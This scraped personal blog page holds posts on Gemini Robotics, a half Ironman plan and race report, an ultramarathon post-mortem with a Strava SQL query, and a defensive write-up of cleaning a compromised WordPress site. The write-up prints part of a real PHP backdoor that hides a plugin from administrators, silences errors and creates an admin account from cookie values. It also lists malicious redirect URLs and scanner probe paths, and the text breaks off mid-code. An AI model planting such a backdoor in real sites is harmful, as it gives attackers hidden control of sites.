From an industry perspective, the availability of models like Gemini Robotics can level the playing field for robotics companies. Instead of needing a large AI team to build a robot’s brain from scratch, startups can leverage a frontier model (via API or licensing) and focus on hardware and specific applications. Google asserts that such models can help “cash-strapped startups reduce development costs and increase speed to market” by handling the heavy AI lifting. Similar services may be offered by cloud providers (e.g. Nvidia’s ISAAC system, etc.). In contrast, some companies might prefer to develop their own AI to avoid dependency – as seen by Figure’s move away from OpenAI. Competitors like Tesla are also working on general-purpose humanoid robots (Tesla’s Optimus) but with a philosophy leaning on vision-based neural networks distilled from human demonstrations (as per Tesla’s AI Day presentations) – an approach less language-oriented than Gemini’s, at least publicly. It remains to be seen which approach yields better real-world performance and safety.

In summary, Gemini Robotics exemplifies the large-scale, knowledge-rich, end-to-end learning approach to robotic AI. Alternative approaches exist on a spectrum from hand-engineered to learning-based, and many are gradually incorporating more AI-driven generality. The consensus in the field is that to achieve human-level versatility in robots, some form of massive, generalist AI is required – whether it’s exactly Gemini or something akin to it. As of now, Gemini Robotics stands at the cutting edge, but it will no doubt inspire both open-source and commercial efforts that use similar techniques to push robotics forward.

Gemini Robotics represents a bold leap forward in the quest to endow robots with general intelligence and adaptability. By fusing vision, language, and action, it allows machines to see the world, reason about it with human-like understanding, and act to carry out complex tasks – all guided by natural language. The origins of this model lie in years of incremental progress (from multi-modal models to robotic transformers) that have now converged into an embodied AI agent unlike any before. Technically, Gemini’s VLA model demonstrates unprecedented capabilities: it can generalize knowledge to new situations, interact fluidly with humans and dynamic environments, and perform fine motor skills once thought too difficult for robots without extensive programming. These achievements inch us closer to the long-envisioned general-purpose robot helper.

Yet this is not an endpoint but a starting point for the next era of robotics. Gemini Robotics does appear to chart the future: a future where intelligent robots can be taught with words and examples, not just hard-coded instructions, and where they can work alongside people in everyday environments. Its approach is likely to influence most robotic AI strategies going forward, whether through direct usage or through the adoption of similar large-model techniques by others. At the same time, the necessity of such powerful AI in robots also brings into focus the responsibilities that come with it. Ensuring safety, aligning actions with human values, and considering the societal impact are as integral to this future as the algorithms themselves.

In comparing Gemini to other approaches, we see that while alternative methods exist (from classical robotics to reinforcement learning), the field is coalescing around the idea that scale and generality in AI are key to cracking the hardest robotics challenges. Gemini’s current edge in performance (reportedly doubling previous systems on generalization benchmarks) validates this direction. But it also highlights that cooperation between human engineers and AI will remain crucial – whether for fine-tuning dexterous skills, implementing safety constraints, or adapting the model to new robot hardware. The “brain” may be general, but the implementation details and guarantees still require human ingenuity and caution.

Fun Stuff for more:

Google DeepMind – “Gemini Robotics brings AI into the physical world” (Blog post, Mar 12, 2025) (Gemini Robotics brings AI into the physical world – Google DeepMind) (Gemini Robotics brings AI into the physical world – Google DeepMind)
Reuters – “Google introduces new AI models for rapidly growing robotics industry” (Mar 12, 2025) (Google introduces new AI models for rapidly growing robotics industry | Reuters) (Google introduces new AI models for rapidly growing robotics industry | Reuters)
Wired – “Google’s Gemini Robotics AI Model Reaches Into the Physical World” by Will Knight (May 2025) (Gemini Robotics – Wikipedia)
IEEE Spectrum – “With Gemini Robotics, Google Aims for Smarter Robots” by Eliza Strickland (Mar 12, 2025) (IEEE News – Short cycle degree in Software Development) (IEEE News – Short cycle degree in Software Development)
Ars Technica – “Google’s new robot AI can fold delicate origami, close zipper bags…” by Benj Edwards (Mar 12, 2025) (Alterslash, the unofficial Slashdot digest) (Alterslash, the unofficial Slashdot digest)
MIT Technology Review – “Gemini Robotics uses Google’s top language model to make robots more useful” by Scott J. Mulligan (Mar 12, 2025) (AITopics | Gemini Robotics uses Google’s top language model to make robots more useful) (AITopics | Gemini Robotics uses Google’s top language model to make robots more useful)
Digital Trends – “Gemini might soon drive futuristic robots that can do your chores” by Patrick Hearn (Mar 12, 2025) (Gemini might soon drive futuristic robots that can do your chores | Digital Trends) (Gemini might soon drive futuristic robots that can do your chores | Digital Trends)
Google DeepMind – “RT-2: New model translates vision and language into action” (Blog post, 2023) (RT-2: New model translates vision and language into action – Google DeepMind) (RT-2: New model translates vision and language into action – Google DeepMind)
Google DeepMind – Gemini Robotics Official Page (Gemini Robotics – Google DeepMind) (Gemini Robotics – Google DeepMind)
Google DeepMind – Gemini Robotics Technical Report (2025) (Gemini Robotics brings AI into the physical world – Google DeepMind) (Gemini Robotics brings AI into the physical world – Google DeepMind)
Others (Nature, Gizmodo, CNBC summaries) for additional context (Techmeme: Google DeepMind launches two AI models, Gemini 2.0-based Robotics and Robotics-ER, to help robots “perform a wider range of real-world tasks than ever before” (Emma Roth/The Verge)) (Techmeme: Google DeepMind launches two AI models, Gemini 2.0-based Robotics and Robotics-ER, to help robots “perform a wider range of real-world tasks than ever before” (Emma Roth/The Verge)).

April 8, 2025 (updated April 8, 2025) By Tim Booher One Comment

Personal Projects & Interests

70.3 plan and result

Training for a Half Ironman (70.3) is equal parts endurance, nutrition, and smart pacing. Over the last few months, I’ve spent countless hours in the pool (plus on the bike and run) to prepare. Below is the nutrition and timing strategy I’m trying out for race day.

I normally like to show my work, but I pulled all my Strava/training data into postgres, used sql to get all my run, bike, and swim data over the last year and did some regressions to understand my pace with common formulas. This post is just the plan, the code, etc is in other posts.

Based on recent ~2–2.5 km swims, I’m estimating 40 minutes for the 1.2‑mile portion. That’s a comfortable pace—fast enough to set up a solid bike, but not so hard that I’m gasping in transition.

I’m guessing 3 minutes or so for transition, factoring in wetsuit removal and the hustle to the bike. My training rides suggest an average 16–17 mph pace over rolling terrain. This translates to 3 hr 15 min–3 hr 30 min for the race, depending on conditions (wind, elevation, etc.). Guessing ~2 minutes to rack the bike, throw on running shoes, and grab nutrition. From run data, I’m aiming for ~8:30–9:00 per mile pace off the bike, targeting 1:50–2:00. If I nail the bike intensity and nutrition, I should stay closer to 1:50–1:55. Overall, that means ~6 hours total, give or take 15–30 minutes, depending on transitions, weather, and race‑day magic. Bah, I think I can do so much better, but this is the attempt.

My fueling strategy focuses on sustaining consistent carbohydrate intake throughout the race by aiming for around 60–90 grams of carbs per hour on the bike, then scaling down slightly to 40–60 grams per hour on the run. To achieve this, I prepared each 750 mL Gatorade bottle with approximately 80 grams of carbohydrate (mixing six tablespoons, or about three‑eighths of a cup of powder), providing 320 calories per bottle.

To save anyone else the time, I’m showing my math for one thing, nutrition.

To ensure each of my $ 750\,mL $ bottles contains approximately $ 80\,g $ of carbohydrates, I used the nutritional information on my Gatorade container. The container specifies a relationship between tablespoons (Tbsp), milliliters (mL), and grams of carbohydrates:

$$ 1.6667\,\text{Tbsp} \,=\, 24.64465726\,\text{mL} \quad\Longrightarrow\quad 22\,\text{g carbs}. $$

From this, I can derive:

$$1\,\text{Tbsp} = \frac{22\,\text{g carbs}}{1.6667} \approx 13.2\,\text{g carbs}.$$

and $$1\,\text{Tbsp} \approx 14.78\,\text{mL}.$$

My goal is to reach about $ 80\,g $ of carbohydrate per bottle. Hence the number of tablespoons, $ N_\text{Tbsp} $, needed is:

$$N_\text{Tbsp} = \frac{80\,\text{g carbs}}{13.2\,\text{g carbs/Tbsp}} \approx 6\,\text{Tbsp}.$$

In terms of volume:

$$6\,\text{Tbsp} \times 14.78\,\text{mL/Tbsp} \approx 88.7\,\text{mL} \quad\approx\, 0.375\,\text{cup}.$$

Therefore, by adding roughly 6 tablespoons of Gatorade powder (about 3/8, cup or 90 mL of powder) to 750 mL of water, I obtain a mix that delivers about 80g of carbohydrates (and roughly 320kcal). This mixture provides a consistent carbohydrate concentration (approximately 6–8%), which is both palatable and effective for fueling during long training sessions or races.

Drinking one bottle per hour meets my baseline carb goal of about 80 grams per hour on the bike. For additional carbohydrate or if I want to reach closer to 90 grams per hour, I incorporate Maurten gels that each provide roughly 25 grams of carbs. These gels also become key during the run, where I take one every 20–30 minutes to match my target of 40–60 grams of carbs per hour.

Recent sweat tests show that my fluid loss rate varies significantly with both temperature and activity intensity. For example, a higher‑intensity run in warm, dry conditions (76 °F and 28% humidity) resulted in losing about 3.1 lb of body weight in just over an hour—roughly 1.4 L (48 oz) per hour. Conversely, a cooler bike session (53 °F, 68% humidity) saw losses closer to 1.0 L (34 oz) per hour, while a shorter ride at 54 °F and 69% humidity required only about 0.5 L (16–17 oz) per hour. These data suggest I should plan fluid intake anywhere between 0.5 and 1.4 L per hour, depending on the temperature, humidity, and how hard I’m pushing.

Given all this, I plan to drink around 24 ounces (one 750 mL bottle) per hour while cycling, then switch to 12–20 ounces per hour on the run. Gatorade supplies a good amount of sodium and it’s a cool 56 degrees tomorrow so I don’t need more.

I had a carb‑rich dinner the tonight, followed by a light breakfast containing about 80–100 grams of carbs two to three hours before the start, plus 16–20 ounces of fluid to begin the day well‑hydrated. In transition one, I can take an extra gel if I feel I need a boost before heading out on the bike, and transition two simply involves a quick fluid sip, changing shoes, and picking up the gels I’ll need on the run.

Let’s see how this goes …. Ok. Race report. The swim was cancelled since the water was too choppy. Disappointing. Additionally, it was pouring monsoon bad at the start. It was confusing. The whole transition zone was empty with people walking their bikes away. Folks were taking shelter next to the port a potties. I got soaked and sought refuge in the nearby hotel.

When the race started, I was surprised to be passing a lot of folks in fancy bikes with those cool aero helmets. Using the aero bars wasn’t that comfortable and with a 30mph crosswind, the bike was sliding around. Lots of folks were fixing flats and the course had some crazy sharp turns and narrow sections. The worst was the bridge where I was on the very edge of stability.

The overriding dynamic was that I needed to pee. Like miles 18 to 26, then miles 48 to 56 were intensely uncomfortable. The only option was two longer waits for a temp toilet. The impact was that the aero bars were super uncomfortable. Despite the wind, etc. I nailed my time with 3 hr ride and convinced I could have done 20 min faster if I could keep fluids in and not be so afraid of the aero bars. My average heart rate was around 120, lots of room to go faster. Power was around 200W. Nutrition was incredible. Never hungry, tank was full. Just too full of water.

The run was awesome. Just cranked in 7:30s and counted down the miles with HR around 165 to 170. Ended with lots in the tank and did a couple mile cool down on the bike. Watch time was 1:38 for the 1/2 marathon.

Now time to get better at this. This was way way different than my ultra.

References:

Josh Gordon
Ben Boehm
Jeukendrup, A. E. (2014). A step towards personalized sports nutrition: carbohydrate intake during exercise. Sports Medicine, 44(Suppl 1), 25–33.
Burke, L. M., Hawley, J. A., Wong, S. H., & Jeukendrup, A. E. (2011). Carbohydrates for training and competition. Journal of Sports Sciences, 29(sup1), S17–S27.

April 5, 2025 (updated April 6, 2025) By Tim Booher 0 Comments

Personal Projects & Interests

How not to run an ultramarathon

Aging makes running harder: recovery slows, endurance wanes, and managing weight is tougher. Stress from increased work responsibilities compounds these challenges. My last job pushed my stress levels high, prompting me to seek relief through distance running—a hardship chosen and controlled, providing a welcome contrast to life’s uncontrollable demands.

In that spirit, I did a lot of running and improved a lot, but I ran a pretty bad 50k in the cowtown Ultra (a bad run is one where I walk). The fun of messing up is that I can use my mind, not just my body — and figure out what went wrong and how to fix it. First of all, I totally value coaching and don’t think it’s a great idea to always be my own coach. Something that pushes me to my limits, like a full Ironman, should really engage professional coaching and more direct coaching would have helped here. That said, I like to be smart on this stuff and I hope my notes and lessons learned are helpful. I certainly learned a lot.

I should know what I’m doing, how to train and how to run. I have run 10 marathons before with the best around 3 hours and trained with the cowtown trailblazers. I did every long run and most of the speed work. So what happened?

Two things: training volume and nutrition.

First I trained very well for a marathon. I felt fine at 25 miles. I did long runs, speed work and marathon nutrition. I didn’t do the ultra things. I didn’t get enough slow long runs in. I didn’t run back to back long runs. I didn’t get high enough weekly volume. I needed to run a lot of slow 10 mile runs in what otherwise were rest days. On top of that I didn’t taper, I stopped two weeks before the race. I changed jobs and cities two weeks before the ultra when snow storms took out the running trails in DC and wasn’t used to long runs on treadmills. In short, an ultramarathon puts the body under stress for a prolonged period, beyond what training simulates. While the long runs built a base, they may not have been long enough to prepare my muscles for continuous, fatigue-resistant performance.

Second, I’m just figuring out endurance nutrition. I’ve had excellent advice but have been too busy with job transition to figure nutrition out. More on that below.

So, to understand how I came to this conclusion, let’s first at my training volume.

Training

I felt pretty good about my training, but an analysis of training log shows a handful of very long efforts (some over 20–30 miles) interspersed with long stretches of very short runs. While I did have consistent big runs—19, 20, 22, 27, 31 miles—those were surrounded by lots of 2–5 mile outings. In principle, shorter runs can be useful for recovery or speed work, but ultra training typically thrives on consistent, moderate‐to‐long runs that gradually build up overall endurance and durability (see Fitzgerald, 80/20 Running or Daniels, Daniels’ Running Formula).

Net net, my training suffered from:

• Too many “small bites,” not enough consistent moderate mileage: Most experienced ultrarunners aim for a weekly volume where the “short days” are still 5–8 miles, the medium days are 10–15, and the big days push over 20. My log often jumps from 2‐ or 3‐mile runs straight to 19+ miles with little in between.

• Sporadic vs. systematic approach: Ideally I’d structure my training in blocks—periods of progressive mileage plus “cutback” weeks—rather than random “short‐short‐short‐BIG” patterns. This ensures adaptation and reduces the risk of overuse or meltdown. It’s true, I planned my long runs but the other days were just what kinda fit in.

• My cold turkey training stop two weeks before the race: I learned that I can’t get faster in two weeks so I let my busy life/new job stop me from working out two weeks before the race. Bad idea, this is called “detraining” and it kinda wastes a lot of hard work. Turns out I have to keep the engine up to prevent a measurable decline in VO₂ max, enzyme activity (especially those related to aerobic metabolism), neuromuscular coordination, and running economy (see Neufer, 1989; Coyle et al., 1984).

Research shows VO₂ max can start dropping after about 7–14 days of rest (Coyle et al., 1984; Mujika & Padilla, 2000). Also enzymes like citrate synthase (key for aerobic energy production) and PFK (glycolytic pathway) can decline with reduced training stimulus (Green et al., 1999). A moderate volume of continued running helps maintain plasma volume, crucial for thermoregulation and sustaining cardiac output (Convertino, 1991). If training load suddenly crashes, plasma volume can drop, which can compromise heat dissipation and endurance.

What can happen in two weeks? I found out it’s true that new major physiological adaptations (e.g., boosting mitochondrial density or capillarization) generally take longer than two weeks to develop. However, fine‐tuning muscle glycogen storage, reactivity to high‐intensity work, and freshening up are real gains that can happen within 1–2 weeks. Turns out that structured tapers are designed to optimize these short‐term changes: repletion of glycogen stores, healing of micro‐tears, and a slight boost to neuromuscular function (Mujika & Padilla, 2003).

For more on this see Fitzgerald, M. (2014). 80/20 Running. New York: Plume and Daniels, J. (2005). Daniels’ Running Formula (2nd ed.). Human Kinetics.

But did I mess up the pace?

I did my research here, but probably got this wrong. Based on my training times, I was going to run as slow as possible while still feeling like I was running. From all my research, this should be around 8:30. I consulted everything from Jack Daniels VDOT tables to McMillan running calculator, but I mostly used the Peter Riegel formula which estimates the time $T_2$ for any new race distance $D_2$, given a known time $T_1$ for a distance D_1:

$$T_2 \;=\; T_1 \times \left(\frac{D_2}{D_1}\right)^{1.06}$$

Where $T_1$ is time (in minutes, hours, or seconds—just be consistent) for the known distance $D_1$. $T_2$ is your predicted time for the new distance $D_2$ and 1.06 is the exponent Riegel derived by fitting race performances from a wide range of distances (from the mile up to the marathon).

This worked. For the first 25 miles my pace was consistently around 8:10–8:20 per mile and I felt great. The hills didn’t slow me down at all. I told myself, just run as slow as possible. But! at mile 25 my pace dropped sharply (10:49, then 12:15, 13:39, and so on). So I hit the wall? No, even though my splits became much slower, the heart rate data remained relatively controlled (see below).

So I’m a wimp? Probably not, I have a pretty high pain tolerance and used to pushing thorough the pain cave at mile 23 in marathons. At the later miles in this race (25+), I just couldn’t run, my legs wouldn’t do it and maybe I was a bit of wimp too. From my mile splits (8:12–8:30 early on, drifting into 10+ near the end) comfort for the early miles of an ultra is often still too fast. Pacing strategies for road marathons sometimes carry over to ultras, but they can backfire over 50K, 50M, or 100K distances. Without enough easy pacing experience in runs over 20+ miles, it’s possible to gradually tear up muscle tissue and never quite realize it until high miles.

This is what happened. My heart rate did not spike or drift abnormally high at the point I started slowing dramatically, which leads me to believe it wasn’t the classic glycogen depletion (“hitting the wall”). When runners truly bonk from carbohydrate depletion, pace typically plummets while heart rate often stays elevated (as the body struggles to compensate) or shows wild cardiac drift upwards under the same pace. On other hand, I ended up forced to run/walk and my heart rate often dropped or stayed steady instead of skyrocketing. Yes, I should have run slower.

Muscle damage and micro‐trauma accumulate in ultras—especially without large volumes of mileage or back‐to‐back long runs. Eccentric loading (especially on downhills) can shred muscle fibers and cause pace to crash even if well fueled.

In the future, I should adopt a pace around 60–90 seconds per mile slower than my “easy run” pace for standard marathons, especially in the first half of an ultra. According to research on pacing in ultras (Lambert & Hoffman, 2010), disciplined starts help avoid crippling muscle damage in the second half. (See the Average Ultra Marathon Pace Guide)

Nutrition

This is an area where I should have done much better. I underestimated the calories burned. I learned the hard way that my “nutrition plan” for this ultra—just Gatorade, two gels, a small muffin, and a couple bananas—was totally inadequate. For an all‐day event like this, I needed a steady stream of carbs, something like 30–60 grams per hour (or more) to keep the tank from running on fumes (see Jeukendrup, 2014). Instead, I basically banked on a sugary sports drink, a couple gels, and some solid foods that were high in fiber and not super friendly to my stomach mid‐race. So, while I thought I was covered, the reality is that I probably didn’t get nearly enough easy‐to‐absorb carbs, and my gut was stuck trying to digest bananas and a muffin when it really needed quick fuel. It’s no wonder my energy levels tanked the moment things got tough. Fortunately, this one is easy to fix.

In the future

All together, ultra performance is about Aerobic Capacity (VO₂ max and thresholds), Muscular Endurance (high running economy, resistance to muscle damage) and Thermoregulatory Efficiency (plasma volume, sweat rate).

It’s clear that ultra finishing success often depends less on a few single monster runs and more on the steady layering of mileage each and every week. Most good ultra plans build around one long run each weekend, but they also sprinkle in 8–12 milers midweek to build durability and be ok with a slower pace. Strava doesn’t matter, the hours do. Also, a key hallmark of ultra training is doing back‐to‐back long runs (e.g., Saturday 20 miles + Sunday 12 miles) to simulate running on tired legs. Without this, I miss a prime chance to build up “muscle resilience,” so those final miles of the race can end up being forced run/walk due to sore, damaged muscles.

references

Knechtle, B. et al. (2012). A systematic review of ultramarathon performance. Open Access Journal of Sports Medicine, 3, 55–67.
Stellingwerff, T. (2016). Case Study: Nutrition and training periodization in three elite marathon runners. Int J Sport Nutr Exerc Metab, 26(1), 31–41.
Fitzgerald, M. (2014). 80/20 Running. New York: Plume.
Daniels, J. (2005). Daniels’ Running Formula (2nd ed.). Human Kinetics.
Bosquet, L., Montpetit, J., Arvisais, D., & Mujika, I. (2007). Effects of tapering on performance: A meta‐analysis. Medicine & Science in Sports & Exercise, 39(8), 1358–1365.
Convertino, V. A. (1991). Blood volume: Its adaptation to endurance training. Medicine & Science in Sports & Exercise, 23(12), 1338–1348.
Coyle, E. F., Hemmert, M. K., & Coggan, A. R. (1984). Effects of detraining on cardiovascular responses to exercise: Role of blood volume. Journal of Applied Physiology, 57(6), 1857–1864.
Green, H. et al. (1999). Adaptations in muscle metabolism to short‐term training are expressed early in submaximal exercise. Canadian Journal of Physiology and Pharmacology, 77(5), 440–444.
Millet, G. Y. (2011). Can neuromuscular fatigue explain running strategies and performance in ultra‐marathons? Sports Medicine, 41(6), 489–506.
Mujika, I., & Padilla, S. (2000). Detraining: Loss of training‐induced physiological and performance adaptations. Sports Medicine, 30(3), 145–154.
Mujika, I., & Padilla, S. (2003). Scientific bases for precompetition tapering strategies. Sports Medicine, 33(13), 933–951.
Neufer, P. D. (1989). The effect of detraining and reduced training on the physiological adaptations to aerobic exercise training. Sports Medicine, 8(5), 302–320.
Saunders, P. U., Pyne, D. B., Telford, R. D., & Hawley, J. A. (2004). Factors affecting running economy in trained distance runners. Sports Medicine, 34(7), 465–485.

Code

SQL is powerful, I was able to get a good dataset from strava that was useful for my analysis. (I can share my code if folks care to get data from strava via python. leave a comment below and I’ll package up and share the code.)

WITH distance_intervals AS (
    SELECT 
        workout_id,
        timestamp,
        distance,
        heartrate,
        distance - LAG(distance, 1, 0) OVER (PARTITION BY workout_id ORDER BY timestamp) AS segment_distance,
        EXTRACT(EPOCH FROM (timestamp - LAG(timestamp, 1, timestamp) OVER (PARTITION BY workout_id ORDER BY timestamp))) AS segment_time
    FROM workout_data_points
    WHERE workout_id = 13708259837
),
binned_intervals AS (
    SELECT 
        workout_id,
        FLOOR(distance / 100) * 100 AS distance_bin,
        SUM(segment_time) AS total_time_seconds,
        SUM(segment_distance) / 1609.34 AS distance_miles,
        AVG(heartrate) AS avg_heartrate
    FROM distance_intervals
    WHERE segment_distance IS NOT NULL
    GROUP BY workout_id, distance_bin
),
pace_calculated AS (
    SELECT 
        distance_bin,
        total_time_seconds / 60.0 AS total_time_minutes,
        CASE 
            WHEN distance_miles > 0 THEN (total_time_seconds / 60.0) / distance_miles
            ELSE NULL 
        END AS pace_min_per_mile,
        avg_heartrate
    FROM binned_intervals
)
SELECT 
    distance_bin,
    CASE 
        WHEN pace_min_per_mile IS NOT NULL 
        THEN 
            FLOOR(pace_min_per_mile)::TEXT || ':' || 
            LPAD(ROUND((pace_min_per_mile - FLOOR(pace_min_per_mile)) * 60)::TEXT, 2, '0')
        ELSE 'N/A'
    END AS avg_pace_min_per_mile,
    avg_heartrate
FROM pace_calculated
ORDER BY distance_bin;

March 17, 2025 (updated March 18, 2025) By Tim Booher One Comment

Engineering & Code

Hacker Dad and Home Website Security

I manage my own webserver via docker and have a wordpress blog for each of my kids (eg lauren.theboohers.org) Yea dad! Well, I noticed that loading my son’s blog (david.theboohers.org) would occasionally redirect. I’m sharing how I dealt with this so you might save some time and pain.

What is the problem?

Over the past couple of days, I noticed an unusual issue with my son’s WordPress site. When attempting to load his site, instead of resolving to the expected domain, it redirects to a suspicious URL, but only once on each different computer.

//tapest.sampden.site/?utm_term=7479977427683246171&tid=4d6163496e74656c#0

This URL then immediately redirects again to another address:

//cyclonesurakkha.com/landers/dvsdfvsdff/17e80009-1383-4430-8c0c-7bbe8733f7b/?zxcv=174157b6896159707ea6b58e2e20d12043b6a67969&domain=panulmi-dev.com&clickid=cv73fn388mbc73bdpgp0&osv=Mac%20OS%20X&language=en-US&lang=en-US&bcid=cv73fn388mbc73bdpgp0.

This final destination is clearly malicious. The URL structure includes random strings, tracking parameters (utm_term, clickid, tid), and what appears to be an obfuscated or dynamically generated path (17e80009-1383-4430-8c0c-7bbe8733f7b). Domains like sampden.site and cyclonesurakkha.com are not associated with my son’s site and strongly suggest a redirect hack, a common tactic used by attackers to divert traffic to spam, phishing, or malware-laden pages.

This behavior points to a compromise within the WordPress installation. Malicious redirects like these are often the result of injected code—typically JavaScript or PHP—inserted into the site’s files or database by exploiting vulnerabilities. Potential entry points could include outdated plugins, themes, or WordPress core files, weak admin credentials, or even a server-level breach (e.g., via .htaccess modifications). The redirect chain also appears conditional, possibly targeting specific user agents, devices (noting osv=Mac%20OS%20X), or first-time visitors, which is a tactic used to evade detection by site admins who might not see the redirect when logged in which explains the intermittent behavior. Super tricky/cool!

Analysis

The easiest thing to do is to install wordfence and do a scan, but that didn’t find anything malicious. Again, we got a complicated exploit here.

To figure this out, I first looked at my access.log from nginx. it’s filled with entries like:

85.208.96.210 - - [13/Feb/2024:03:11:36 +0000] "GET /page/9/?page=12 HTTP/1.1" 200 47523 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"

185.191.171.9 - - [13/Feb/2024:03:11:44 +0000] "GET /2014/07/19/www.arpc.afrc.af.mil/home/hqrio.aspx/www.arpc.afrc.af.mil/home/hqrio.aspx/www.arpc.afrc.af.mil/home/hqrio.aspx/?paged=16 HTTP/1.1" 404 20875 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"

So what is this? These entries from an Nginx server log provide valuable insights into web traffic and potential security issues. Each log entry captures detailed information about an incoming HTTP request, including the originating IP address, the timestamp, requested URL, HTTP method, protocol used, status code returned, data transferred, referring URL, and the client’s user-agent string. For example, the entry above shows the IP 85.208.96.210 successfully (status 200) requesting /page/9/?page=12 via an HTTP GET request, indicating a typical crawling action from SemrushBot, a known SEO indexing bot. Another entry from IP 185.191.171.9 attempted to access a suspiciously formatted URL resulting in a 404 status, indicating the requested resource didn’t exist, which could suggest automated scanning for vulnerabilities.

So to make sense of all this, I downloaded a 3GB log file and put it in a database with this code:

But that is too much data, so I made a view for the last 10 days:

CREATE VIEW logs_last_10_days AS
SELECT *
FROM logs
WHERE timestamp >= NOW() - INTERVAL '10 days';

And I wanted a table of valid redirects:

CREATE VIEW valid_http_logs AS
SELECT *
FROM logs_last_10_days
WHERE request_method IN ('GET', 'POST', 'HEAD', 'OPTIONS', 'PUT', 'DELETE');

Now time to get to work. I want to see what requests are generating 404’s:

SELECT request_uri, COUNT(*) AS occurrences
FROM logs
WHERE status_code = 404
GROUP BY request_uri
ORDER BY occurrences DESC
LIMIT 20;

and that gives me:

request_uri	occurrences
/?author=1	8704
/.env	5786
/?author=2	5481
/wp-content/plugins/WordPressCore/include.php	4475
/?author=3	4233
/RDWeb/Pages/	4181
/wp-includes/images/include.php	3822
/wp-includes/widgets/include.php	3780
/?author=4	3537
/?author=5	3512
/.git/config	3204
/admin.php	2819
/users/sign_in	2783
/robots.txt	2618
/wp-content/plugins/core-plugin/include.php	2585
/simple.php	2505
/+CSCOE+/logon.html	2317
/2017/03/10/three-way-troubleshooting/	2301
/wp-content/themes/include.php	2269
/wp-content/plugins/include.php	2258

So you can see a mix of automated scans, bot activity, and attempts at exploiting common vulnerabilities. For example, repeated requests to URLs such as /?author=1, /wp-content/plugins/include.php, or /wp-includes/widgets/include.php suggest attackers or scanners probing for WordPress vulnerabilities or configuration mistakes, trying to access sensitive paths that don’t exist. These repeated “author” parameter requests (?author=1, ?author=2, etc.) often indicate automated scanning tools that enumerate usernames to discover login credentials. Similarly, attempts to access files like include.php inside wp-content and wp-includes folders are known patterns targeting known vulnerabilities in poorly maintained WordPress installations. Other URLs like RDWeb/Pages/ point to automated vulnerability scans targeting Microsoft Remote Desktop Web Access interfaces.

I did a ton of other log analysis, and didn’t find anything there.

My guess this smells like a client-side JavaScript redirect injected into the WordPress site rather than an Nginx-level rewrite. That would explain why my Nginx logs don’t show the redirect explicitly—I’m likely seeing 200 responses for the initial page load, and the browser handles the rest.

So the log files don’t have any data. Time to look in the actual wordpress database:

SELECT option_name, LEFT(option_value, 500) AS preview
FROM wp_options
WHERE option_name IN ('siteurl', 'home')
   OR option_value LIKE '%tapest.sampden.site%'
   OR option_value LIKE '%cyclonesurakkha.com%'
   OR option_value LIKE '%<script%'
   OR option_value LIKE '%eval(%'
   OR option_value LIKE '%base64_decode%';

This query displays the first 500 characters of any option values that might contain unexpected scripts, encoded data, or even external URLs. The output immediately flagged a suspicious entry under the option name wpcode_snippets. When I inspected the content of wpcode_snippets, I saw a lengthy, obfuscated PHP code snippet. This snippet included calls to functions like eval(), base64_decode(), and even logic that could conditionally create a new administrator account if certain cookie values were present (they weren’t).

This led me to the plugin responsible for managing these code snippets. It turns out that the Insert Headers and Footers plugin—now often referred to as WPCode Lite—has had documented security issues in the past. Vulnerability reports (e.g., from Search Engine Journal Search Engine Journal and WPScan.

This plugin that wasn’t in the usual location (wp‑content/plugins) but instead was tucked away in an unexpected directory—specifically under wp‑content/uploads/wpcode. By placing the malicious plugin (or its remnants) in a less-scrutinized folder (like wp‑content/uploads), attackers avoid detection and bypass automatic updates or admin panel listings. This hidden plugin (a compromised version of WPCode Lite/Insert Headers and Footers) was used to inject and persist malicious code (as seen in the wpcode_snippets option). Its presence enabled the attacker to execute arbitrary PHP code (via eval and base64_decode), create backdoor admin accounts, and otherwise manipulate the site without obvious traces.

I discovered it by running file searches (e.g., find . -type d -name “wpcode*”), which revealed a directory under wp‑content/uploads.

Let’s look at the exploit. (This is very interesting for me.)

SELECT option_value FROM wp_options WHERE option_name = 'wpcode_snippets';

Produces:

First, the snippet is stored as a serialized array. The outer structure begins like this:

a:1:{s:10:"everywhere";a:1:{i:0;a:12:{s:2:"id";i:78; ...
$_pwsa = 'a516c9f37ca86f549b3cdff68167e708';

This means that under the key “everywhere”, there is one snippet with several properties (id, title, code, etc.). The important part here is the code field that holds 6836 characters of PHP code. The next line acts as a “password” or token that the exploit uses for validating incoming requests.

Immediately following, the code checks if the current user is an administrator and if a certain GET parameter is not set:

if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
    add_action('admin_head', function () {
        echo '<style>';
        echo '#toplevel_page_wpcode { display: none; }';
        echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
        echo '#wpcode-notice-global-review_request { display: none; }';
        echo '</style>';
    });

    add_action('wp_head', function () {
        echo '<style>';
        echo '#toplevel_page_wpcode { display: none; }';
        echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
        echo '#wpcode-notice-global-review_request { display: none; }';
        echo '</style>';
    });

    add_filter('all_plugins', function ($plugins) {
        unset($plugins['insert-headers-and-footers/ihaf.php']);
        return $plugins;
    });
}

The snippet adds inline styles via admin_head and wp_head hooks to hide UI elements with IDs like #toplevel_page_wpcode and #wp-admin-bar-wpcode-admin-bar-info. This makes the malicious backdoor “invisible” to site administrators. It also adds a filter to the all_plugins array to remove an entry for insert-headers-and-footers/ihaf.php. This is an attempt to hide the compromised plugin from the WordPress admin interface.

The code then checks if a helper function _red() is already defined; if not, it disables error reporting and defines several helper functions. By setting error reporting to 0 and turning off display errors, the snippet ensures that if any issues occur during execution, they won’t be visible—helping the attacker remain hidden. The helper _gcookie() retrieves a cookie and decodes it from base64. This is used later for authentication and triggering backdoor actions.

if (!function_exists('_red')) {
    error_reporting(0);
    ini_set('display_errors', 0);

    function _gcookie($n)
    {
        return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : '';
    }

Next, the snippet checks if the cookie ‘pw’ matches the previously set token ($_pwsa). If it does, it looks at another cookie (‘c’) to decide what action to take. The snippet uses the cookie ‘pw’ as a secret. If it matches the hard-coded value (a516c9f37ca86f549b3cdff68167e708), the code proceeds.

When _gcookie(‘c’) returns ‘au’, it retrieves cookies for username (u), password (p), and email (e). If valid and the username doesn’t already exist, it calls wp_create_user() and assigns the new user an administrator role. This effectively gives the attacker a backdoor admin account.

    if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
        switch (_gcookie('c')) {
            case 'sd':
                $d = _gcookie('d');
